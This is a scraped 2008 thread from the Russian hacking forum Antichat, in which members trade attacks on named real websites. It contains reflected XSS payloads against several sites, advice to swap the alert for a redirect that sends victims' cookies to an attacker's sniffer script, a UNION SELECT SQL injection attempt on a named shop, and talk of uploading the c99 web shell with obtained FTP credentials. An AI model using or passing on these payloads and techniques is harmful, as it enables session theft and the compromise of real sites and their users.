Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.11.2008, 22:45
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
не работает по ЭТОЙ ссылке xss
http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
тут всместо alert(document.cookie) просто вставь
window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;
тут
http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
нет xss
тут
http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
нет xss
тут
http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
нет xss
|
|
|
29.11.2008, 22:50
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333
Репутация:
112
|
|
хммм. у меня в IE алерт вылезает по всем ссылкам
|
|
|
|
29.11.2008, 22:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:
вместо alert(document.cookie) просто вставь
window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;
|
|
|
|
30.11.2008, 02:28
|
|
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774
Репутация:
71
|
|
Помогите с одной проблемой пожалста,
Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85
есть сайт, подобрал к нему колличество колонок, походу правильное потомучто если добавить еще одну ошибка меняется на вот такую
Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/lib/site_common.php on line 123
сам запрос выглядит вот так
http://www.shytobuy.com/product.php?prod_id=1316+union+select+null,null,nu ll,null,null,null,null/*
проблема в том что сайт не дает добро ни на какое количество колонок, постоянно выводится ошибка, как с этим можно бороться и что вообще можно тут придумать...
спасибо за ответы
|
|
|
|
30.11.2008, 03:14
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
У меня есть достук к фтп (логин пасс) заливать надо етот шел туда c99comandshell???
|
|
|
|
30.11.2008, 03:26
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
залил а оно не заходит туда(((
Forbidden
You don't have permission to access /shell on this server.
вот че пишет
|
|
|
|
30.11.2008, 03:28
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
права поменяй иль залей в др. папку ..
|
|
|
|
30.11.2008, 03:35
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
Та не там кажеться дело в самом сайте. Забил на него
|
|
|
|
30.11.2008, 08:38
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Выстави пасс и зайди.
|
|
|
|
30.11.2008, 12:08
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Подскажите...
Это MD5?- 1114168c640b7642fd41f0b59fad1db4
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
